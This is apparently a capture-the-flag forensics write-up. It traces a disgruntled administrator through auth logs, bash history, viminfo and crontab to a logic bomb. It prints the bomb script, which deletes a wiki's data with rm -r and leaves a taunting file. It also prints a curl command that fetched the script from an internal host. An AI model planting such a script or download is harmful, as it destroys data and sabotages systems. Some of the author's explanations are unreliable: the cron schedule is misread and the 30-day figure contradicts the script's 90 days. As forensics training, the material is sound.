Dec 28 07:14:27 ip-10-10-243-54 sudo: pam_unix(sudo:session): session opened for user root by cybert(uid=0)
Dec 28 07:14:27 ip-10-10-243-54 sshd[869]: Received signal 15; terminating.
Dec 28 07:14:27 ip-10-10-243-54 sshd[1520]: Server listening on 0.0.0.0 port 22.
Dec 28 07:14:27 ip-10-10-243-54 sshd[1520]: Server listening on :: port 22.
Dec 28 07:14:27 ip-10-10-243-54 sudo: pam_unix(sudo:session): session closed for user root
Dec 28 07:14:34 ip-10-10-243-54 su[1533]: Successful su for root by cybert
Dec 28 07:14:34 ip-10-10-243-54 su[1533]: + /dev/pts/0 cybert:root
Dec 28 07:14:34 ip-10-10-243-54 su[1533]: pam_unix(su:session): session opened for user root by cybert(uid=1001)
Dec 28 07:14:34 ip-10-10-243-54 su[1533]: pam_systemd(su:session): Cannot create session: Already running in a session
Dec 28 07:14:35 ip-10-10-243-54 su[1533]: pam_unix(su:session): session closed for user root
Dec 28 07:14:42 ip-10-10-243-54 sshd[1454]: Received disconnect from 10.14.35.192 port 60188:11: disconnected by user
Dec 28 07:14:42 ip-10-10-243-54 sshd[1454]: Disconnected from user cybert 10.14.35.192 port 60188
Dec 28 07:14:42 ip-10-10-243-54 sshd[1318]: pam_unix(sshd:session): session closed for user cybert
Dec 28 07:14:42 ip-10-10-243-54 systemd-logind[862]: Removed session 1.
Dec 28 07:14:51 ip-10-10-243-54 sshd[1555]: Accepted password for root from 10.14.35.192 port 57478 ssh2
Dec 28 07:14:51 ip-10-10-243-54 sshd[1555]: pam_unix(sshd:session): session opened for user root by (uid=0)
Dec 28 07:14:51 ip-10-10-243-54 systemd: pam_unix(systemd-user:session): session opened for user root by (uid=0)
Dec 28 07:14:51 ip-10-10-243-54 systemd-logind[862]: New session 3 of user root.
Dec 28 07:14:54 ip-10-10-243-54 sshd[1555]: Received disconnect from 10.14.35.192 port 57478:11: disconnected by user
Dec 28 07:14:54 ip-10-10-243-54 sshd[1555]: Disconnected from user root 10.14.35.192 port 57478
Dec 28 07:14:54 ip-10-10-243-54 sshd[1555]: pam_unix(sshd:session): session closed for user root
Dec 28 07:14:54 ip-10-10-243-54 systemd-logind[862]: Removed session 3.
Dec 28 07:14:54 ip-10-10-243-54 systemd: pam_unix(systemd-user:session): session closed for user root
Dec 28 07:15:08 ip-10-10-243-54 systemd-logind[862]: Power key pressed.
Dec 28 07:15:08 ip-10-10-243-54 systemd-logind[862]: System is powering down.
Mar 3 18:11:57 ip-10-10-89-91 passwd[801]: password for 'ubuntu' changed by 'root'
Mar 3 18:11:57 ip-10-10-89-91 systemd-logind[847]: Watching system buttons on /dev/input/event0 (Power Button)
Mar 3 18:11:57 ip-10-10-89-91 systemd-logind[847]: Watching system buttons on /dev/input/event1 (Sleep Button)
Mar 3 18:11:57 ip-10-10-89-91 systemd-logind[847]: Watching system buttons on /dev/input/event2 (AT Translated Set 2 keyboard)
Mar 3 18:11:57 ip-10-10-89-91 systemd-logind[847]: New seat seat0.
Mar 3 18:11:57 ip-10-10-89-91 sshd[958]: Server listening on 0.0.0.0 port 22.
Mar 3 18:11:57 ip-10-10-89-91 sshd[958]: Server listening on :: port 22.
Mar 3 18:14:37 ip-10-10-89-91 sshd[1757]: Accepted password for root from 10.11.27.46 port 42888 ssh2
Mar 3 18:14:37 ip-10-10-89-91 sshd[1757]: pam_unix(sshd:session): session opened for user root by (uid=0)
Mar 3 18:14:37 ip-10-10-89-91 systemd: pam_unix(systemd-user:session): session opened for user root by (uid=0)
Mar 3 18:14:37 ip-10-10-89-91 systemd-logind[847]: New session 1 of user root.
Mar 3 18:17:01 ip-10-10-89-91 CRON[2006]: pam_unix(cron:session): session opened for user root by (uid=0)
Mar 3 18:17:01 ip-10-10-89-91 CRON[2006]: pam_unix(cron:session): session closed for user root
Mar 3 18:17:43 ip-10-10-89-91 sshd[1757]: Received disconnect from 10.11.27.46 port 42888:11: disconnected by user
Mar 3 18:17:43 ip-10-10-89-91 sshd[1757]: Disconnected from user root 10.11.27.46 port 42888
Mar 3 18:17:43 ip-10-10-89-91 sshd[1757]: pam_unix(sshd:session): session closed for user root
Mar 3 18:17:43 ip-10-10-89-91 systemd-logind[847]: Removed session 1.
Mar 3 18:17:50 ip-10-10-89-91 systemd-logind[847]: Power key pressed.
Mar 3 18:18:20 ip-10-10-89-91 systemd-logind[847]: Delay lock is active (UID 0/root, PID 882/unattended-upgr) but inhibitor timeout is reached.
Mar 3 18:18:20 ip-10-10-89-91 systemd-logind[847]: System is powering down.
Mar 3 18:25:03 ip-10-10-89-91 systemd-logind[786]: Watching system buttons on /dev/input/event0 (Power Button)
Mar 3 18:25:03 ip-10-10-89-91 systemd-logind[786]: Watching system buttons on /dev/input/event1 (Sleep Button)
Mar 3 18:25:03 ip-10-10-89-91 systemd-logind[786]: Watching system buttons on /dev/input/event2 (AT Translated Set 2 keyboard)
Mar 3 18:25:03 ip-10-10-89-91 systemd-logind[786]: New seat seat0.
Mar 3 18:25:03 ip-10-10-89-91 sshd[830]: Server listening on 0.0.0.0 port 22.
Mar 3 18:25:03 ip-10-10-89-91 sshd[830]: Server listening on :: port 22.
Mar 3 18:25:07 ip-10-10-89-91 sshd[879]: Accepted password for root from 10.11.27.46 port 41178 ssh2
Mar 3 18:25:07 ip-10-10-89-91 sshd[879]: pam_unix(sshd:session): session opened for user root by (uid=0)
Mar 3 18:25:07 ip-10-10-89-91 systemd-logind[786]: New session 1 of user root.
Mar 3 18:25:07 ip-10-10-89-91 systemd: pam_unix(systemd-user:session): session opened for user root by (uid=0)
Mar 3 18:25:29 ip-10-10-89-91 sshd[879]: Received disconnect from 10.11.27.46 port 41178:11: disconnected by user
Mar 3 18:25:29 ip-10-10-89-91 sshd[879]: Disconnected from user root 10.11.27.46 port 41178
Mar 3 18:25:29 ip-10-10-89-91 sshd[879]: pam_unix(sshd:session): session closed for user root
Mar 3 18:25:29 ip-10-10-89-91 systemd-logind[786]: Removed session 1.
Mar 3 18:25:32 ip-10-10-89-91 systemd-logind[786]: Power key pressed.
Mar 3 18:25:32 ip-10-10-89-91 systemd-logind[786]: System is powering down.
Mar 30 22:46:28 ip-10-10-144-223 passwd[790]: password for 'ubuntu' changed by 'root'
Mar 30 22:46:28 ip-10-10-144-223 systemd-logind[878]: Watching system buttons on /dev/input/event0 (Power Button)
Mar 30 22:46:28 ip-10-10-144-223 systemd-logind[878]: Watching system buttons on /dev/input/event1 (Sleep Button)
Mar 30 22:46:28 ip-10-10-144-223 systemd-logind[878]: Watching system buttons on /dev/input/event2 (AT Translated Set 2 keyboard)
Mar 30 22:46:28 ip-10-10-144-223 systemd-logind[878]: New seat seat0.
Mar 30 22:46:28 ip-10-10-144-223 sshd[956]: Server listening on 0.0.0.0 port 22.
Mar 30 22:46:28 ip-10-10-144-223 sshd[956]: Server listening on :: port 22.
Mar 30 22:46:52 ip-10-10-144-223 sshd[1434]: Accepted password for root from 10.100.2.89 port 41636 ssh2
Mar 30 22:46:52 ip-10-10-144-223 sshd[1434]: pam_unix(sshd:session): session opened for user root by (uid=0)
Mar 30 22:46:52 ip-10-10-144-223 systemd: pam_unix(systemd-user:session): session opened for user root by (uid=0)
Mar 30 22:46:52 ip-10-10-144-223 systemd-logind[878]: New session 1 of user root.
Mar 30 22:46:55 ip-10-10-144-223 sshd[1434]: pam_unix(sshd:session): session closed for user root
Mar 30 22:48:32 ip-10-10-144-223 systemd-logind[878]: Removed session 1.
Mar 30 22:50:58 ip-10-10-144-223 sshd[1728]: Accepted password for root from 10.100.2.89 port 41748 ssh2
Mar 30 22:50:58 ip-10-10-144-223 sshd[1728]: pam_unix(sshd:session): session opened for user root by (uid=0)
Mar 30 22:50:59 ip-10-10-144-223 systemd: pam_unix(systemd-user:session): session opened for user root by (uid=0)
Mar 30 22:50:59 ip-10-10-144-223 systemd-logind[878]: New session 3 of user root.
Mar 30 22:51:27 ip-10-10-144-223 sshd[1728]: Received disconnect from 10.100.2.89 port 41748:11: Bye
Mar 30 22:51:27 ip-10-10-144-223 sshd[1728]: Disconnected from user root 10.100.2.89 port 41748
Mar 30 22:51:27 ip-10-10-144-223 sshd[1728]: pam_unix(sshd:session): session closed for user root
Mar 30 22:51:27 ip-10-10-144-223 systemd-logind[878]: Removed session 3.
Mar 30 22:51:31 ip-10-10-144-223 sshd[1851]: Accepted password for root from 10.100.2.89 port 41776 ssh2
Mar 30 22:51:31 ip-10-10-144-223 sshd[1851]: pam_unix(sshd:session): session opened for user root by (uid=0)
Mar 30 22:51:31 ip-10-10-144-223 systemd: pam_unix(systemd-user:session): session opened for user root by (uid=0)
Mar 30 22:51:31 ip-10-10-144-223 systemd-logind[878]: New session 5 of user root.
Mar 30 23:02:48 ip-10-10-144-223 sshd[2167]: Accepted password for root from 10.100.2.89 port 42272 ssh2
Mar 30 23:02:48 ip-10-10-144-223 sshd[2167]: pam_unix(sshd:session): session opened for user root by (uid=0)
Mar 30 23:02:48 ip-10-10-144-223 systemd-logind[878]: New session 7 of user root.

Now, that’s a lot of uninteresting logs. I was interested in the COMMANDS that were used, so I ran cat /var/log/auth.log | grep -i command to filter for the commands used on the server.

Dec 22 07:56:27 ip-10-10-158-38 sudo:   ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/bin/date -s last year
Dec 22 07:56:36 ip-10-10-158-38 sudo:   ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/bin/nano /etc/ssh/sshd_config
Dec 22 07:57:45 ip-10-10-158-38 sudo:   ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/bin/systemctl restart ssh
Dec 22 07:58:09 ip-10-10-158-38 sudo:   ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/usr/sbin/useradd -m cybert -s /bin/bash
Dec 22 07:58:14 ip-10-10-158-38 sudo:   ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/usr/bin/passwd cybert
Dec 22 07:58:24 ip-10-10-158-38 sudo:   ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/usr/sbin/visudo
Dec 28 06:17:30 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/apt install dokuwiki
Dec 28 06:18:12 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/rm /var/lib/dpkg/lock
Dec 28 06:18:17 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/dpkg --configure -a
Dec 28 06:18:33 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/lsof /var/lib/dpkg/lock
Dec 28 06:18:36 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/lsof /var/lib/dpkg/lock-frontend
Dec 28 06:18:47 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/rm /var/lib/dpkg/lock-frontend
Dec 28 06:18:52 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/dpkg --configure -a
Dec 28 06:19:01 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/apt install dokuwiki
Dec 28 06:20:46 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/chown www-data:www-data /usr/share/dokuwiki
Dec 28 06:20:55 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/chown www-data:www-data /usr/share/dokuwiki/VERSION /usr/share/dokuwiki/bin /usr/shar
e/dokuwiki/doku.php /usr/share/dokuwiki/feed.php /usr/share/dokuwiki/inc /usr/share/dokuwiki/index.php /usr/share/dokuwiki/install.php /usr/share/dokuwiki/lib /usr/share/dokuwiki/vendor -R
Dec 28 06:21:05 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/chown www-data:www-data /var/lib/dokuwiki
Dec 28 06:21:14 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/chown www-data:www-data /var/lib/dokuwiki/acl /var/lib/dokuwiki/data /var/lib/dokuwik
i/inc /var/lib/dokuwiki/lib -R
Dec 28 06:21:20 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/ln -s /var/lib/dokuwiki/data /usr/share/dokuwiki/data
Dec 28 06:21:28 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/ln -s /etc/dokuwiki/license.php /usr/share/dokuwiki/conf/license.php
Dec 28 06:22:12 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/nano /etc/apache2/sites-available/dokuwiki.conf
Dec 28 06:22:25 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/sbin/a2ensite dokuwiki
Dec 28 06:22:37 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/systemctl reload apache2
Dec 28 06:26:52 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/sbin/adduser it-admin
Dec 28 06:27:34 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/sbin/visudo
Dec 28 06:29:14 ip-10-10-168-55 sudo: it-admin : TTY=pts/0 ; PWD=/home/it-admin ; USER=root ; COMMAND=/usr/bin/vi bomb.sh
Dec 28 06:30:10 ip-10-10-168-55 sudo: it-admin : TTY=pts/0 ; PWD=/home/it-admin ; USER=root ; COMMAND=/bin/nano /etc/crontab
Dec 28 07:01:22 ip-10-10-117-219 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/passwd root
Dec 28 07:01:30 ip-10-10-117-219 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/passwd root
Dec 28 07:14:07 ip-10-10-243-54 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/nano /etc/ssh/sshd_config
Dec 28 07:14:27 ip-10-10-243-54 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/sbin/service sshd restart

About 30 lines were enough to manually read through them, but using cat /var/log/auth.log | grep -i command | grep -i install I could narrow it down to just three lines.

Dec 28 06:17:30 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/apt install dokuwiki
Dec 28 06:19:01 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/apt install dokuwiki
Dec 28 06:20:55 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/chown www-data:www-data /usr/share/dokuwiki/VERSION /usr/share/dokuwiki/bin /usr/shar
e/dokuwiki/doku.php /usr/share/dokuwiki/feed.php /usr/share/dokuwiki/inc /usr/share/dokuwiki/index.php /usr/share/dokuwiki/install.php /usr/share/dokuwiki/lib /usr/share/dokuwiki/vendor -R

Lines 1 and 2 of that part of the log showed that dokuwiki was installed.

Answer: /usr/bin/apt install dokuwiki


What was the present working directory (PWD) when the previous command was run?

That can be seen in the same lines of the log.

Answer: /home/cybert


Task 4 – Let’s see if you did anything bad

Keep going. Our disgruntled IT was supposed to only install a service on this computer, so look for commands that are unrelated to that.

So the culprit was supposed to install a wiki but they did some more stuff.

Which user was created after the package from the previous task was installed?

For this, I looked at the commands using cat /var/log/auth.log | grep -i command again, but skipped anything related to dokuwiki, i.e. anything between installing dokuwiki and the last mention of dokuwiki:

Dec 28 06:22:37 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/systemctl reload apache2
Dec 28 06:26:52 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/sbin/adduser it-admin
Dec 28 06:27:34 ip-10-10-168-55 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/sbin/visudo
Dec 28 06:29:14 ip-10-10-168-55 sudo: it-admin : TTY=pts/0 ; PWD=/home/it-admin ; USER=root ; COMMAND=/usr/bin/vi bomb.sh
Dec 28 06:30:10 ip-10-10-168-55 sudo: it-admin : TTY=pts/0 ; PWD=/home/it-admin ; USER=root ; COMMAND=/bin/nano /etc/crontab
Dec 28 07:01:22 ip-10-10-117-219 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/passwd root
Dec 28 07:01:30 ip-10-10-117-219 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/bin/passwd root
Dec 28 07:14:07 ip-10-10-243-54 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/bin/nano /etc/ssh/sshd_config
Dec 28 07:14:27 ip-10-10-243-54 sudo:   cybert : TTY=pts/0 ; PWD=/home/cybert ; USER=root ; COMMAND=/usr/sbin/service sshd restart

The culprit created a user right after finishing the setup of dokuwiki. That is line 2 of the above log. The command used was /usr/sbin/adduser it-admin.

Answer: it-admin


A user was then later given sudo priveleges. When was the sudoers file updated? (Format: Month Day HH:MM:SS)

Right after creating the it-admin user, the culprit used the command /usr/sbin/visudo, which is used to edit the sudoers file. That command was used on line 3 of the above log file.

Answer: Dec 28 06:27:34


A script file was opened using the “vi” text editor. What is the name of this file?

Line 4 of the above log shows that within the it-admin directory, this command was used: /usr/bin/vi bomb.sh

Answer: bomb.sh


Task 5 – Bomb has been planted. But when and where?

That bomb.sh file is a huge red flag! While a file is already incriminating in itself, we still need to find out where it came from and what it contains. The problem is that the file does not exist anymore.

What is the command used that created the file bomb.sh?

Now, the root user (or more accurately: a user using elevated privileges) accessed the bomb.sh file in the home directory of the it-admin user, but since the creation of the file is not shown in the auth.log, I looked in the it-admin user’s bash history to see how that user perhaps created the file. I used cat /home/it-admin/.bash_history to view the bash history.

whoami
curl 10.10.158.38:8080/bomb.sh --output bomb.sh
ls
ls -la
cd ~/
curl 10.10.158.38:8080/bomb.sh --output bomb.sh
sudo vi bomb.sh
ls
rm bomb.sh
sudo nano /etc/crontab
exit

As can be seen on line 2, the file was created by being downloaded using the curl command.

Answer: curl 10.10.158.38:8080/bomb.sh --output bomb.sh


The file was renamed and moved to a different directory. What is the full path of this file now?

At first I thought about just looking inside the crontab because after having edited the bomb.sh file, the culprit changed the crontab file, so I assumed they added a cron job to run the .sh file with the new name. However, to know for sure which file in the crontab is the .sh file formerly known as bomb.sh, I looked inside the .viminfo file to see what the culprit did to the file and how they saved it. To read the contents of the .viminfo file, I used this command: cat /home/it-admin/.viminfo

# This viminfo file was generated by Vim 8.0.
# You may edit it if you're careful!

# Viminfo version
|1,4

# Value of 'encoding' when this file was written
*encoding=utf-8


# hlsearch on (H) or off (h):
~h
# Command Line History (newest to oldest):
:q!
|2,0,1672208992,,"q!"
:saveas /bin/os-update.sh
|2,0,1672208983,,"saveas /bin/os-update.sh"

# Search String History (newest to oldest):

# Expression History (newest to oldest):

# Input Line History (newest to oldest):

# Debug Line History (newest to oldest):

# Registers:

# File marks:
'0  6  0  /bin/os-update.sh
|4,48,6,0,1672208992,"/bin/os-update.sh"

# Jumplist (newest first):
-'  6  0  /bin/os-update.sh
|4,39,6,0,1672208992,"/bin/os-update.sh"
-'  1  0  /bin/os-update.sh
|4,39,1,0,1672208955,"/bin/os-update.sh"

# History of marks within files (newest to oldest):

> /bin/os-update.sh
* 1672208988 0
" 6 0

Line 16 shows how the culprit saved the .sh file as /bin/os-update.sh.

Answer: /bin/os-update.sh


When was the file from the previous question last modified? (Format: Month Day HH:MM)

I checked if the file was still in /bin/os-update.sh, which it was, so to see the fulle date and time, I used ls -l --full-time /bin/os-update.sh, which showed:

-rw-r--r-- 1 root root 325 2022-12-28 06:29:43.998004273 +0000 /bin/os-update.sh

I didn’t bother getting the correct format with a single command, so I just adjusted it manually.

Answer: Dec 28 06:29


What is the name of the file that will get created when the file from the first question executes?

To answer that question, I took a look inside the os-update.sh file using cat /bin/os-update.sh.

# 2022-06-05 - Initial version
# 2022-10-11 - Fixed bug
# 2022-10-15 - Changed from 30 days to 90 days
OUTPUT=`last -n 1 it-admin -s "-90days" | head -n 1`
if [ -z "$OUTPUT" ]; then
        rm -r /var/lib/dokuwiki
        echo -e "I TOLD YOU YOU'LL REGRET THIS!!! GOOD RIDDANCE!!! HAHAHAHA\n-mistermeist3r" > /goodbye.txt
fi

Seems like that employee really didn’t like their workplace. Or maybe they just didn’t like to install dokuwiki? Anyways, line 7 shows that the text is written to a file called /goodbye.txt.

Answer: /goodbye.txt


Task 6 – Following the fuse

So we have a file and a motive. The question we now have is: how will this file be executed?

Surely, he wants it to execute at some point?

At what time will the malicious file trigger? (Format: HH:MM AM/PM)

As mentioned on task 5, a cron job was created, which can be seen in both the auth.log as well as the .bash_history. To see the content of the current crontab file, I used cat /etc/crontab.

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
0 8 * * * root /bin/os-update.sh
#

Line 15 shows that the /bin/os-update.sh file is scheduled to be executed on every 0th minute of every 8th hour every month on every day of the month.

Answer: 08:00 AM


Task 7 – Conclusion

Thanks to you, we now have a good idea of what our disgruntled IT person was planning.

We know that he had downloaded a previously prepared script into the machine, which will delete all the files of the installed service if the user has not logged in to this machine in the last 30 days. It’s a textbook example of a “logic bomb”, that’s for sure.

Look at you, second day on the job, and you’ve already solved 2 cases for me. Tell Sophie I told you to give you a raise.

I’m kidding, of course! But you did good, kid.

Answer: none


That concludes this CTF. It was an easy one to practice some basic Linux forensics.